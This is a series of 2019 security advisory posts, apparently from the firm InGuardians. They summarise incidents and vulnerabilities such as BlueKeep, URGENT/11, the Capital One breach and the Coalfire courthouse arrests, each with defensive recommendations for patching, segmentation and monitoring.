In the entire space of penetration testing services, physical penetration tests carry the most direct risk. There is a greater opportunity for physical harm to a provider’s operators and physical damage to client facilities than in strictly data-based security checks.  As such, it is important to take a highly rigorous and regimented approach to ensure that the risk is mitigated as best as possible, prior to commencing the active operations stage.

Attention to detail, a clear understanding of the many organizations beyond IT that may be involved, and comprehensive documentation are essential for success. The service provider and client should use threat modeling to determine the type of test or assessment that is most appropriate. Once a client and provider have determined that the client wants to move forward with a physical penetration test, the client organization must affirm that it exercises authority over the buildings in scope and demonstrate this comprehensively to the provider. Clear Rules of Engagement (RoE) and a narrative describing the assessment must be agreed upon by the client and provider, and then followed.

InGuardians recommends that providers take extra effort to understand the client’s motivations and needs when a client requests a physical penetration test or a full-scope red team penetration test. In many cases, finding a probable threat from the physical vector that outweighs the threat from more conventional sources can be a challenge. Undertaking a physical penetration test for the “cool factor” should raise concerns on the part of the provider.

A vital stage of every single assessment, regardless of the vector, is assuring that the person or team requesting the assessment has the authority to do so and that they have the legal and organizational authority to request the test against the desired scope.  This often requires an assessment of impacted parties and consideration of including them in the process, prior to the start of the assessment.

Another vital step here is to confirm that the client organization actually exercises authority over facilities in scope and does not sublet/lease its space. The provider must understand which areas of the buildings are leased or owned by the client, what rights this gives to common areas, and what areas of the building are leased, sublet, or managed by third parties. The provider should require the client to engage the landlord or management company, for facilities it does not own.

The other major miscommunication, in this case, revolved around the definitions laid out in the mutually agreed upon Rules of Engagement (RoE).  This misunderstanding isn’t unique to this type of agreement but exists whenever deeply technical or specialized terminology is used.  It is the experts’ role, in this case, Coalfire, to explain in clear detail what is meant by each term in the RoE.  InGuardians also recommends a pre-assessment meeting that confirms the RoE, in addition to clearly defining the terms in it, as an integral part of any physical assessment.

InGuardians believes that by following the steps below, organizations can reduce the risk of similar episodes such as those that occurred in Dallas County (Iowa) Courts.

– Clear engagement with a client in order to determine the type of test or assessment that best matches the risk faced by the organization
– Include all impacted, relevant parties in the discussion, including the security company and local law enforcement agencies
– Clearly define the  rules of engagement and defined terms

InGuardians supports calls for all charges related to this case to be dropped against Coalfire’s employees, and their records expunged of this incident. This situation is unfortunate, and it directly affects the consultant’s ability to hold a clearance or pass background checks.  These charges and arrests directly impact the consultants’ ability to pay their bills and feed their families.

Additional Resources
Iowa County Home Rule Implementation, Office of County Sheriff.  N.B. The office of sheriff is an elective office. 

“Men arrested for breaking into Dallas County Courthouse after judicial branch hires them to test ‘vulnerability’ of court records” (Des Moines Register)

“Documents: Courthouse break-in attempts part of the agreement, but not at night” (KCCI)

“Iowa officials claim confusion over scope led to arrest of pen-testers” (ArsTechnica)

Coalfire CEO Tom McAndrew’s Statement (Coalfire Blog)

A message of support from TrustedSec

10/29/19 End of Life Less Than Three Months Away for Windows 7 and Windows Server 2008

End of Life Less Than Three Months Away for Windows 7 and Windows Server 2008
Microsoft will end free support for Windows 7 and Windows Server 2008 (both the original release and R2) on January 14, 2020. This means there will be no further patches or support for these operating systems, unless users purchase extended security update services. Despite this, many organizations have not begun the planning and work to migrate off of these platforms.  It is estimated that roughly 70% of all enterprise applications are running on Server 2008.

The impact will range from organizations having to pay for Extended Security Updates (ESU) to letting support lapse and be left vulnerable.  The cost per year for ESU for Server 2008 is 75% of the site license cost, up to a maximum of 225% of the license cost if an organization purchases three years of support.  The price of ESU per Windows 7 device will scale from $25 to $100 each year until they expire in January of 2023.  In addition to the cost, keep in mind that Microsoft will not be providing technical support beyond the January 14, 2020 deadline.

Malicious attackers and penetration testers alike find endpoints with operating systems that have passed their End of Life (EOL) to be incredibly easy targets. These systems provide a penetration tester with a convenient foothold on a network and in a domain.

InGuardians recommends conducting an accurate inventory to identify systems running soon to be end-of-life (EOL) operating systems. This inventory must include endpoints that are not domain-joined. Following the inventory, it is imperative to plan for upgrading or replacing the EOL’ed systems.

Windows Server 2008-Specific Recommendations
Upgrade to the newest version of Windows Server that can host the enterprise applications. Most software that can run on Server 2008 can run on Server 2016 and Server 2019. In addition, upgrading domain controllers to newer versions can provide new features that aid in administration and improve security.

Windows 7-Specific Recommendations
Upgrade to Windows 10. This provides substantial new administration and security features.

If systems cannot be upgraded or replaced for software or hardware compatibility reasons, isolate the systems as much as possible using firewalls to prevent any but explicitly necessary communication with other computers, including restricting internet access. Work with vendors to identify an upgrade path for legacy software so that EOL systems can be phased out.

Additional Resources
Lifecycle FAQ-Extended Security Updates (Microsoft Support)

“Prepare for Windows Server 2008 end of support“ (

“Microsoft support lifecycle – Search product lifecycle” (

10/22/19 Third-party VPN provider confirms it was compromised

Third-party VPN provider confirms it was compromised

NordVPN, a third-party provider of global VPN Services has confirmed that it suffered a compromise of one of its VPN servers in Finland during March 2018. According to NordVPN, someone physically accessed the data center where their servers were located and then exploited an insecure remote management system put in place by the operators of the data center.

There are a number of issues exposed with the NordVPN breach.  As far as we can interpret, there was a physical security breach, followed by a remote management software breach, followed by unauthorized access to the VPN server in question.

Anytime a third party VPN is used, the security of the connection is never a known quantity. Although assurances are made by third-party providers, the only way to know that a connection is secure is by using your own VPN that is managed by your own organization.  In this case, confidential information could have been compromised.

Until more information is released from NordVPN, we should assume that any confidential information that took place over their service from at least March of 2018 should be considered compromised.

InGuardians recommends that your organization manage its own VPN service, rather than going with a third party. Likewise, ensure that the VPN product is a secure and patched platform, as some of these, like Pulse VPN, have had issues as recently as October 2019.

Furthermore, require strong authentication and physical security at all of the data centers where you host your servers.
Ensure that all exposed services are patched especially ones that allow for remote management and administration.
Last but not least, routinely audit physical and digital access to critical systems looking for any instances of unplanned change.

Additional Resources
Initial article from TechCrunch:

Recent issues with PulseVPN:

10/15/19 DNS over HTTPS: Friend or Foe?

DNS over HTTPS: Friend or Foe?

In recent weeks there has been heated discussion of the DNS over HTTPS (DoH) implementation indicated in IETF RFC8484 and developed more than 2 years ago. While the protocol for implementing DNS queries securely is not new, it has yet to be implemented. However, DoH has still become quite relevant, as both Google Chrome and Mozilla Firefox intend to implement it by the end of 2019.

With implementation of DoH, the intent is to move an unencrypted and unauthenticated protocol to a new transport method, one that can utilize the power of a TLS encrypted exchange and the perceived circle of trust, as implemented with Certificate Authority trusts.

In most cases the move to a more secure transport method would be seen as a great improvement. DoH would prevent attackers from modifying DNS requests in transit across the internet, nor would they be able to manipulate local lookups using malware.

However,  the proposed change to use DoH for DNS lookups by default within Chrome and Firefox  seriously hampers enterprise system administrators from observing DNS requests, as they would now be encrypted.  This lack of visibility effectively eliminates some quite effective security controls, including DNS blacklisting. Incident response also can become a greater challenge because responders would lose access to potential evidence vital in determining root cause, in addition to the loss of real time observation of DNS traffic.

InGuardians recommends that organizations relying on Chrome and Firefox consider disabling DoH within the browser, reverting back to standard, plaintext DNS (examples found in the Additional Resources section), in order to maintain visibility and overall security implementations already in place.. In these cases, DoH detractions outweigh the perceived benefits in the short term.

Ideally organizations should not allow end users to install browsers such as Chrome or Firefox but deploy them utilizing the available enterprise management resources, in order to allow system administrators to appropriately configure the browser enterprise wide.

Alternatively, additional protections can be put in place in order to protect the integrity and confidentiality of DNS exchanges.  These protections include the implementation of DNSSEC for integrity, and the use of client based VPNs (with split tunnel disabled) where confidentiality is required, such as on a public WiFi network.

Organizations should continue to evaluate the adoption of DoH, particularly if the protocol implements ways to augment current, effective security methodologies.

Additional Resources
DNS Queries over HTTPS (DoH)

“What’s next in making Encrypted DNS-over-HTTPS the Default”

“The Chromium Projects: DNS over HTTPS (aka DoH)”
(Chromium for Developers)

“DNS-over-HTTPS causes more problems than it solves, experts say”

Turning off DoH:

“The Chromium Projects: DNS over HTTPS (aka DoH)”
(Chromium for Developers)

“How to Turn off Trusted Recursive Resolver in Mozilla Firefox”

Chrome Enterprise Management

Firefox Enterprise Management

10/9/19 URGENT/11: Highest-severity, publicly-exploitable vulnerabilities found in more than 30 vendors’ embedded and RTOS devices

URGENT/11: Highest-severity, publicly-exploitable vulnerabilities found in more than 30 vendors’ embedded and RTOS devices

Last Tuesday, the Food and Drug Administration issued an official safety communication, warning the public that the URGENT/11 vulnerabilities, originally thought to be confined to the VxWorks real-time embedded operating system (RTOS), were present in four additional embedded operating systems.  The URGENT/11 vulnerabilities present a danger to health care devices, industrial control systems, SCADA systems, phones, printers and firewalls, at least.   The vulnerable embedded operating systems include, as of this writing:

•    ENEA’s Operating System Embedded (OSE)
•    Green Hills’ INTEGRITY
•    TRON Forum’s ITRON
•    IP Infusion’s ZebOS
•    Wind River’s VxWorks

Attackers can use the URGENT/11 vulnerabilities to control, disrupt and/or modify vulnerable devices.

The URGENT/11 vulnerabilities affect these operating systems through their third-party internet protocol (IP) stack, IPnet. The operating system vendors listed above bought IPnet licenses from IPnet creator Interpeak until 2006, when Wind River bought Interpeak and ceased selling and supporting IPnet, instead choosing to integrate it into its flagship VxWorks product.

This situation presents several challenges to organizations and those holding the chief information security officer (CISO) title. First, the URGENT/11 vulnerabilities are not only severe, they can have an incredibly damaging impact in the real world where they allow an attacker to fully control and disrupt healthcare devices (including patient monitors), industrial control systems (including industrial controllers and robots), and SCADA systems responsible for the operation of vital utilities (including water and electricity).  Second, it’s not clear what products may incorporate IPnet — a full list of licensees who have incorporated the IPnet software has not been publicly provided by Wind River. Third, there’s a difficulty in patching/updating the vulnerable devices, as described by URGENT/11-discoverer Ben Seri (VP of Research at Armis Security), who was quoted in Wired Magazine saying, “Often the update mechanism is almost nonexistent or it’s such an analog process it’s almost like it’s with a screwdriver. It’s not something that can be done at scale. So I don’t know if it will ever be accomplished to update all of these machines.”

There is evidence supporting this statement. For example, Becton Dickinson Alaris (BD Alaris) has not issued an update for its vulnerable Alaris © PC Unit. BD Alaris states in their product security bulletin, “The Interpeak IPnet standalone TCP/IP networking stack does not currently have a remediation provided by the vendor.” It goes on to discuss compensating controls, without promising any forthcoming code updates.

InGuardians recommends that organizations find the vulnerable devices in their inventory. Armis Security maintains a list of product advisories — a link to this is included below, as the first link in the additional resources section. Armis has also released a detection tool, which endeavors to both identify devices with  IPnet network stacks and discover whether one of the 11 URGENT/11 vulnerabilities is present in those devices. Note: InGuardians has not evaluated this tool and thus cannot confirm the validity of the results it provides, nor what risks are introduced in either using or failing to use this tool.

Once an organization finds which devices have the URGENT/11 vulnerability, InGuardians recommends updating and/or replacing the vulnerable devices. Organizations should carefully consider whether compensating controls sufficiently mitigate risk.  Given the severity of the consequences, organizations should remember that this decision belongs to the device’s owner; the risk cannot be transferred to the creators of the device’s software.

Additional Resources
“URGENT/11 – Affected Devices” [Armis]

“URGENT/11 detection tool by Armis”[GitHub]

“URGENT/11 Affects Additional RTOSs – Highlights Risk to Medical Devices” [Ben Seri, Armis Blog]

DHS: ICS Medical Advisory (ICSMA-19-274-01)

“Decades-Old Code Is Putting Millions of Critical Devices at Risk” [Wired Magazine]

10/1/19 Emergency out-of-cycle patch from Microsoft - must be manually installed
Emergency out-of-cycle patch from Microsoft – must be manually installed

On Monday, September 23, Microsoft released a rare out-of-band security update to address two vulnerabilities found in Windows Defender and Internet Explorer (CVE-2019-1367 and CVE-2019-1255).  The US Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency subsequently issued an alert advising all sectors to patch ASAP.

CVE-2019-1367 is a critical flaw in Internet Explorer, versions 9 to 11. The flaw was discovered by Clément Lecigne of the Google Threat Analysis Group. Attackers achieve remote code execution by luring a user to browse a malicious website with a vulnerable browser. The attacker gains the ability to execute code in the context of the user that accessed the malicious web page. Depending on the user’s privilege level, this could allow an attacker to install and run programs, view and modify data, or create new user accounts with full rights and access. Some of these actions may require the user to have privileged access.

CVE-2019-1255 is a less severe flaw which allows for denial of service attacks, triggered by Windows Defender improperly handling files.

Clément Lecigne discovered CVE-2019-1367 was being actively exploited in the wild.  According to Microsoft’s vulnerability notice, the vulnerability is a memory corruption issue, which permits the attacker to execute code in the context of the current user.

CVE-2019-1255 is a file-handling flaw that an attacker could use to prevent users from executing operating system programs.  This would allow the attacker to render the system dysfunctional.  This flaw is considered less severe because it requires the attacker to already have code running on the target machine.  This flaw has not yet been reported to be exploited in the wild.

InGuardians recommends that Microsoft Windows users download and manually install the patch for CVE-2019-1367. As of the time of this writing, the patch is not yet available through Windows Update, Microsoft Update, or Windows Server Update Services (WSUS) – it must be downloaded and installed manually.. Because of the severity of the flaw and its active exploitation in the wild, both Microsoft and DHS urge this be done ASAP. CVE-2019-1255 will auto-update via the Malware Protection Engine, but users should verify the update is completed on their systems.

Additional Resources
CVE-2019-1367 | Scripting Engine Memory Corruption Vulnerability (Microsoft)

“Nine words to ruin your Monday: Emergency Internet Explorer patch amid in-the-wild attacks”  (The Register)

“DHS Urges Patch for Two Microsoft Out-of-Band Vulnerabilities” (Health IT Security)

“Microsoft Releases Out-of-Band Security Updates”  (CISA – National Cyber Awareness System)

9/23/19 New SD Express memory card brings NVMe speed, but PCIe risk
In 2018, the SD Association ratified v7.0 of its standard, bringing the potential speed of NVMe drives to a new SD card standard by allowing the cards to directly access the computer’s PCI-e bus. Called “bus mastering,” this allows the SD card to read and write the computer’s RAM, without the permission or intervention of the computer’s CPU. Recently, the first host controller was developed for these cards.

The standard defines the “SD Express card,” which utilizes the same NVMe technology present in higher-end solid state drives. The highest speed peripheral protocols derive raw speed from communicating directly with a computer or phone’s RAM over a PCIe bus: Firewire cables, Thunderbolt cables and, of course, PCIe cards, including NVMe solid state drives. By eliminating the CPU from the interaction between peripheral and RAM, there’s a decrease in latency and CPU utilization. On the other hand, the CPU can lose the ability to confine the peripheral’s type of interaction with memory.

Lest one believe this theoretical to exploit, note that researcher Ulf Fritz has weaponized this functionality with the PCILeech tools. Using either a commodity USB-to-PCIe card or field-programmable gate array (FPGA), a bad actor who accesses a computer’s PCIe bus can then read and modify the computer’s RAM. Using software like PCILeech, the bad actor can compromise the operating system, modify RAM, or steal data.

No SD Express cards have yet been brought to market, but they’re expected in the next year. These cards could be modified or created to attack a computer, using the same techniques as the current PCILeech-supported devices. There’s increased danger here, as an overwhelming percentage of computers ship with a microSD or SD card slot. These slots are externally and casually accessible to a bad actor.

InGuardians recommends that organizations ensure that policy is already in place to handle the exposure that PCILeech poses: a laptop with a locked screen may not be safe against compromise. If an attacker can reach a PCIe-connected port (SD Express, Thunderbolt, Firewire, or PCIe bus interface), they can read and write to RAM, changing the state of the machine.

InGuardians further recommends that organizations remain vigilant, watch for the release of SD Express cards and laptops/phones that support this standard. Organizations should develop policies concerning the use of, and protection against, these devices. Particularly-sensitive organizations, such as government agencies, should consider physically rendering the ports unusable.

Conducting a security review of all upcoming IT projects is a great way to evaluate the risks that deploying new technology poses to your organization.

Additional Resources

SD and microSD Express Cards 7.1 (SD Alliance Whitepaper)

“Phison Develops PS5017 Controller for SD Express MicroSD Express Cards” (Anandtech)

“Direct Memory Attack the Kernel“: (Def Con 24 Talk by Ulf Frisk)

“PCIe Injector Gateway – based on Xilinx Artix7 FPGA and FTDI USB FT601 chip” (Firmware Security Blog)

9/17/19 Local city government defeats ransomware attack.
Years after both Mirai and WannaCry were successful in exploiting Windows SMB vulnerabilities, systems remain unpatched. The original and derivative malware versions are still using the same flaws and default credentials to gain access, particularly for ransomware attacks. The City of New Bedford, Massachusetts’ IT staff identified the presence of the file-scrambling RYUK nasty. Criminals demanded $5.3 million. The city counter-offered $400,000, based on a budget related to the city’s cyber-insurance policy limits. When the cyber-criminals declined, the city continued negotiating, buying the IT staff the time needed to bolster defenses and restore files from backups. The city paid no ransom and had no interruption in service.

Derivatives of already successful malware are increasing their effectiveness and uses. They have improved capabilities and altered signatures in order to evade detection. The fact that attackers are still successfully using several-year old patchable-vulnerabilities reveals the current state of insecurity at many organizations. The failure of companies to patch suggests other gaps in IT security practices and policies. 

That is a key distinction: practice vs. policy. Lack of policy will almost ensure that a security function is not done. Having a policy alone does not ensure that it is followed. Specific practices must be devised, be sensible, and be able to be followed without extraordinary or disruptive efforts. Difficult security is too often failed security – it’s not done, done badly, or filled with workarounds and compromise.

The City of New Bedford, Massachusetts found a way to deal with ransomware without paying: shoring up defenses, restoring from backups, and rebuilding systems. “We haven’t seen any interruption in municipal services at all,” said Mayor Mitchell.  This solution, undoubtedly, cost the company far less than even their negotiating position.

The first thing to learn from New Bedford’s case is that the best way to defeat an attacker is not to let them get access to the system.  A well-governed information security program that includes vulnerability management and remediation needs to be implemented and tested.  Your organization’s IT patch management and policies must be effective at identifying vulnerable systems and deploying patches across an organization in a timely way. Applying patches two to three years after their release is not timely, nor cost-effective.

The second critical lesson is that when an organization is compromised, clean backups of systems, software and data are essential to recovery and business continuity. Yet these backups are only a single component to a full defense-in-depth strategy; all is still lost if the root cause is not discovered, eradicated, and monitored before returning the restored systems back to service.
None of this is new, but evidence shows patching and recovery may not be done as well as one might think. A surge in IoT and SMB attacks have targeted unpatched vulnerabilities in 2019 – this highlights the need for diligence.
Review both policy and practice. Do internal checks to verify the current patch state, and follow a new patch through your process. Review and exercise data recovery plans. This does not need to be large scale; pick a system and do a test restore to a clean system.

Practice, because actual data recovery from an EternalBlue ransomware hack should not be your first rodeo.

Additional Resources
“Massachusetts city tells ransomware scumbags to RYUK off, our IT staff will handle this easily” (The Register)

“Attack Landscape H1 2019: IoT, SMB traffic abound” (F-Secure Blog)

“Wielding EternalBlue, Hackers Hit Major US Business” (Information Security Media Group)

9/9/19 Public Metasploit module for BlueKeep released

There is now a public open source exploit for the BlueKeep vulnerability checked into the Metasploit Framework.  Security researchers have long been concerned about the public release and availability of a stable exploit for the BlueKeep exploit tool that would work against all versions of Microsoft Windows.  In initial testing, this release isn’t quite as stable and powerful as the exploit tool originally released by the “Shadowbrokers” group, but it is the first step in that direction.  Now that the exploit community has code it can work with, there will be rapid improvements and evolutions of the exploit and defenses.

What does this mean for the blue teams at companies around the world?  If your vulnerable systems weren’t being compromised by BlueKeep already, ensure that you are at the current patch level and go hunting for malicious activity.  We will also see better signatures for our perimeter defenses, so be on the lookout for new signatures/rules being added and whether they show the exploit being used against your systems.

The impact of this is twofold: On one side the release of the exploit module for Metasploit has created an avenue for attackers to more easily attack Windows-based systems.  On the other, Metasploit is also used by blue teams at large organizations to test their defenses and now they have another arrow in the quiver. InGuardians sees the overall impact of the release of the BlueKeep Metasploit module as a positive, in that while it might mean more systems are compromised in the near time, it will also be used to test and validate that systems are patched at corporations and large networks.

Patch, run, repeat.  In Microsoft’s Knowledge Base article on the BlueKeep vulnerability and patch, they rate the vulnerability against older than current patch level as “1 – Exploitation More Likely”.  In addition to staying current on patch levels, stay up to date on the rules/signatures for your perimeter monitoring and defense systems.  Apply the latest signatures and look for alerts matching BlueKeep activity, it is important to note that exploit activity for BlueKeep may appear identical to vulnerability scanning for the same.  Investigate whether the source of the activity is a valid vulnerability scanner and if not treat it as hostile and/or compromised.

Going beyond the simple patch fix, network segmentation down to layer 2 with private VLANs and a network vulnerability management program are both good places to start.

Additional Resources
Microsoft advisory and patch for BlueKeep (note: their site needs to be updated now that there is publicly available exploit code).

Ars Technica article on the release of the Metasploit module:

ZDNET article on the Australian Signals Directorate warning about the public release

8/5/19 106 Million People Impacted by Capital One Data Breach
It is alleged that in March of this year, Paige A. Thompson gained access to a number of records belonging to Capital One. The attacker was able to gain access to several of Capital One’s Amazon S3 buckets by abusing a token used by a misconfigured Web Application Firewall (WAF). This provided enough access to enumerate and view information stored in these S3 buckets. After downloading the contents of the S3 buckets (containing several gigabytes of data) the attacker uploaded the stolen information to her personal GitHub page, which was created in her name.

While 106 million people were affected by this breach, only a small percentage of the victims had bank accounts, Social Security Numbers, or Social Insurance Numbers compromised. The large portion of the compromised data contained credit card application data. This breach highlights the need to review access logs and, in particular, account permissions for data hosted in the cloud.

Performing regular reviews of Cloud, in this case, AWS, account permissions will reveal gaps in actual account access versus business need. InGuardians also strongly recommends that access logs be reviewed on a continual basis. If Capital One trended regular account access, the spike in usage from this account could likely have been flagged rather quickly. One final control that could have made a difference in both this and similar incidents, would be whitelisting access to the S3 bucket, to restrict access to only Capital One’s approved IP address range.

In addition to continued log analysis, behavioral models of account activity, usage, and commands executed over time could have revealed potential compromise. Capital One, as part of their investigation, noted that the initial account access to the WAF should have never had the authority to execute the commands used to gain access to the S3 buckets.  This activity, in particular, is an illustrative example of a significant deviation from normal operation compared to a known baseline,  one that should trigger alerts for further investigation.

Additional Resources
Capital One Data Theft impacts 106 million people

Information on the Capital One Cyber Incident

USA vs Paige Thompson

7/30/19 University Systems Breached Through Known ERP Vulnerability
The US Department of Education states that systems at 62 colleges and universities have been compromised through an improper authentication vulnerability in Ellucian Enterprise Resource Planning (ERP) software. In a technology Security Alert, the Office of Federal Student Aid writes that a vulnerability affecting certain versions of Ellucian Banner Web Tailor and Banner Enterprise Identity Services has been exploited at the schools to create thousands of fake student accounts, some of which have been used to conduct criminal activity. The vulnerability was first detected late last year, and  Ellucian developed and released a patch several months ago.

The flaw was detected in December 2018, and the patch was released in May 2019, which is often a busy time for colleges. Coupling this timing with a CVSSv3 rating of 8.1 (high, but not critical) likely made it harder for campus information security departments to insist the patch be applied rapidly.  It is likely that this vulnerability has been used to compromise many universities & colleges around the world.  Given that fake accounts from this exploit have already been detected committing crimes, the overall impact will continue to grow in the coming weak.

InGuardians recommends that institutions of higher education apply patches to any Ellucian ERP systems. Additionally, particularly given Ellucian’s claims that admission portals are being exploited by botnets, InGuardians recommends that institutions add reCAPTCHA capabilities to those portals, which could greatly hinder that activity, particularly with this vulnerability.

In addition to patching and installing reCAPTCHA functionality to your portals, InGuardians recommends verifying valid accounts and checking application logs for signs of compromise.  If you use Ellucian software, now is good time to be actively hunting your network for signs of compromise, regardless if you had patched before this most recent announcement.

Additional Resources
“Ellucian systems compromised at 62 universities, Education Dept. says” (EdScoop)

“Hackers breach 62 US colleges by exploiting ERP vulnerability” (ZDNet)

“Over 60 US Colleges Compromised by ERP Exploit” (InfoSecurity Magazine) 

Exploitation of Ellucian Banner System Vulnerability” (US Department of Education and Federal Student Aid)

“Banner Web Tailor and Banner Enterprise Identity Services Vulnerability Disclosure” (Joshua Milliken)

CVE-2019-8978 Detail (NIST)

7/1/19 Rogue Raspberry PI used to steal NASA’s secrets
NASA’s Office of Inspector General has revealed a nearly year-long compromise by an advanced persistent threat (APT) group of NASA’s Jet Propulsion Lab (JPL). The APT bad actor accomplished this by placing a single-board Raspberry Pi computer onto JPL’s network. Because JPL had little to no segmentation on their network, a single network endpoint was able to steal and exfiltrate valuable and regulated information.

The larger issue at hand is that an insider threat deployed a rogue device on the network and used it to steal sensitive information.

The bad actor gained access to quite a bit of information, including plans for Mars missions being managed by JPL. Some of the information is illegal to export from the United States, under the International Traffic in Arms (ITAR) regulations.

The larger impact is potentially severe, as most organizations are not prepared to identify and isolate a rogue device on their internal networks.

Information security practitioners both inside and outside companies strongly push for network segmentation, which is critical to containing or even avoiding attacks like this one. In the process of building networks, however, companies generally deploy full connectivity for every single computer to every other, whether that connectivity will be required by the business. For example, in many companies, a publicly-accessible machine in the lobby can often reach the machines holding the most valuable intellectual property or controlling the most critical business information.

Private VLANs are one of many options available to aid in network segmentation.  The theory behind this is to create private VLANs on switches for each workstation, and promiscuous private VLANs for the servers.  This allows workstations to communicate with servers, but not with each other.

InGuardians also recommends regular sweeps of networks and office spaces.  During these sweeps, physical and network spaces are actively scanned attempting to identify all network connected devices.  In addition to sweeps, InGuardians recommends using network monitoring tools to identify new machines connected to the network.  Zeek (formerly bro), arpwatch and many other correlation engines will keep a running log of all new machines that join the network.

Additional Resources
NASA hacked because of unauthorized Raspberry Pi Connected to its Network (

NASA OIG final report on Cyber Security

Configuring private VLANS on Cisco Switches

Zeek, formerly bro-ids, network monitoring utility:

5/14/19 Microsoft patches serious Remote Desktop Services Vulnerability
Microsoft released a security update that patches a remote code execution vulnerability in Remote Desktop Services (formerly Terminal Services) on a number of platforms.  The list of affected in-support Windows versions includes: Windows 7, Windows Server 2008 R2, and Windows Server 2008.  The vulnerability is pre-authentication, which led Microsoft to announce that this was a worm-able flaw.

A remote code execution exploit against a service that is often exposed, coupled with the fact that it is pre-authentication, makes the potential severity and impact of this flaw to be high.

According to Microsoft’s advisory, Windows 8 and Windows 10 users are not affected by this vulnerability.  Due to the severity of the vulnerability Microsoft has issued patches for both Windows XP and Server 2003 which are no longer actively supported.

The top thing you can do is apply the latest updates for your Microsoft systems. Enabling Network Level Authentication (NLA) can be used to reduce the risk of an unauthenticated attacker, but still leaves the machine vulnerable.

The patches that fix the Remote Desktop Services vulnerability (CVE-2019-07-08) can be found here:

Microsoft customers that are in-support and have automatic updates turned on should already be patched.  Patch verification through your vulnerability management program is recommended.

Additional Resources
Microsoft Advisory for the Remote Desktop Services vulnerability (CVE-2019-07-08):

Microsoft Security Updates for Remote Desktop Services vulnerability (CVE-2019-07-08):

5/1/19 Supply chain attack targets video game developers

Researchers from Kaspersky and ESET have identified evidence that the same attackers that compromised ASUS with a supply chain attack have also compromised at least three video game companies.  Supply chain attacks target the manufacturers of hardware and software upstream of the final victim company.

In order to compromise ASUS the attackers managed to subvert the ASUS software update service.  Undiscovered for over five months, this allowed attackers to compromise thousands of ASUS customer systems.

In the case of the compromised game companies attackers targeted Microsoft Visual Studio, uploading malware into the developers build environment, ultimately granting the attackers the ability to add their own malicious code to production software.  This in turn gave the attackers the ability to backdoor the games installed on thousands of unsuspecting customers.

The impact of the compromised games should be low to medium to our clients.  This is mainly because most businesses do not allow games to be loaded on to their desktops and laptops.  Two of the three game companies have been identified as Electronics Extreme and Zepetto.  Given that these two companies are based in Asia, it is not surprising that the majority of infected systems are located there.  Kaspersky and ESET have said they have identified almost 100k infected systems.

The impact of supply chain attacks, however, is immense because this compromised Microsoft Visual Studio.  This should be a reminder for everyone in infosec to re-read “Reflections on Trusting Trust” by Ken Thompson.  Ken described a devastating attack chain that was originally discovered by Paul Karger and Roger Schell in 1974. The attack described the compromise of a binary compiler, so that every program it compiled was malicious.

To wrap up, the impact of successful supply chain attacks is severe.  If the supply chain attack compromises a compiler or an update service, all downstream users will be compromised.

InGuardians recommends conducting a supply chain security analysis.  This will provide your organization with a threat landscape as it concerns the elements of your supply chain.  The difficult aspect of this is that in most cases the downstream companies usually have little visibility into the source code or hardware they purchase.  An important part of the QA & build process should be to ensure that no “additional” functionality or code goes into your end product.

Additionally, this becomes an opportune time to audit and revise B2B and other contract language to include the need for security requirements from suppliers.  This language could include the requirement to conduct and share the results of recent security assessments and code audits under non-disclosure agreements.

Additional Resources
Supply Chain Hackers Snuck Malware Into Videogames –

Hackers Hijacked ASUS Software Updates to Install Backdoors on Thousands of Computers

Reflections on Trusting Trust by Ken Thompson

Countering “Trusting trust” by Bruce Schneier –

InGuardians Events & Resources

Upcoming Webinars
“RED TEAM PRIMER FOR EXECUTIVES” with InGuardians Offensive Security Team
May 30, 12 PM PDT / 3 PM EDT

Join Mike Poor as he moderates this roundtable discussion with members of the InGuardians Offensive Services Team.  This webinar will discuss red team penetration test definitions, what clients should be considering when preparing for one, and what to expect to learn from the results.  If you have questions that you would like answered on the webinar, contact us via email ( or ask us on Twitter (@inguardians).

Register here:

For all upcoming webinars, please visit:

Upcoming Classes

Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Security West | San Diego | May 9 – May 13 2019

Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified InstructorAmsterdam, Netherlands | May 20 – May 25, 2019

4/2/19 Critical Flaw in Rockwell Automation Hardware Allows for DoS of Popular ICS Component

Researchers have discovered a vulnerability in version 5.001 of the software for Rockwell’s PowerFlex 525 drive component.  This drive component is flexible in the number of roles it can perform and sees use in a number of industrial application from conveyors to fan and pump controls.  The vulnerability,  CVE-2018-19282, was first disclosed to Rockwell by researchers at Applied Risk, back in June, 2018. It allows for an attacker to send a crafted flow of packets that crashes the Common Industrial Protocol (CIP) network stack on the system.  Interestingly, when executed, this attack vector locks out all other connections while allowing the attacker to maintain a connection through which traffic can continue to flow.  The only method to clear the state is a hard-power reset of the drive.

An attack of this nature provides a real threat to both the Availability and the Integrity segments of the CIA triad, which lays at the heart of most security designs.  For ICS systems, which typically place emphasis on the availability portion of the triad as opposed to conventional IT, which tends to favor confidentiality as the primary segment of the triad, this type of attack is particularly dangerous.

As with most serious ICS-focused vulnerabilities, this one has the potential to transit between the digital landscape and impact the kinetic landscape by allowing the attacker the ability to alter the functioning of the drives and potentially causing physical harm to the systems they ostensibly control.

The ability to change the functioning state of control for devices designed to govern cooling or air flow to whatever state an attacker desires, coupled with the inability for legitimate operators to connect to the device increase the risk of the vulnerability.

Fortunately, Rockwell has released a patch for affected software.  However, it should also be noted that other manufacturers also released a number of security advisories over the last week for a range of products.  This is an indication of the increased awareness on their part of the growing threat landscape affecting such systems.

For Non-ICS systems, this should serve as another reminder that in today’s growing Internet of Things, there are likely devices attached to your networks that lay somewhere in-between conventional IT resources and ICS resources.  Knowing that those devices are present and ensuring that those devices are patched are two challenging pieces of a growing puzzle that is managing modern computing environments.

As the number of attractive ICS targets increases, and as attempts to develop the capability to impact the physical world from compromised digital systems also increases, it becomes increasingly important for organizations to maintain strict disciple as it regards patching systems.  This is especially relevant for ICS  systems which have not always been rigorously patched.

Organizations which use the affected Rockwell systems should patch them immediately, if they have not already done so.

In addition, controlling the flow of TCP and UDP traffic on Port 2222 and Port 44818 (which are the key ports used by this Rockwell system), by restricting the sources that can access the devices can help to mitigate the attack vector.

Additional Resources

Rockwell Product Page


InGuardians Events & Resources
Upcoming Webinars

“SCANNERS, TUNNELS, AND SIMS, OH MY!” with Justin Searle, Director of ICS Security .
April 18, 12 PM PDT / 3 PM EDT

Learn more about Control Things Tools project & and the Python library that provides the command-line and graphical interfaces for these tools.
Register here:

“RED TEAM PRIMER FOR EXECUTIVES” with InGuardians Offensive Security Team
May 30, 12 PM PDT / 3 PM EDT

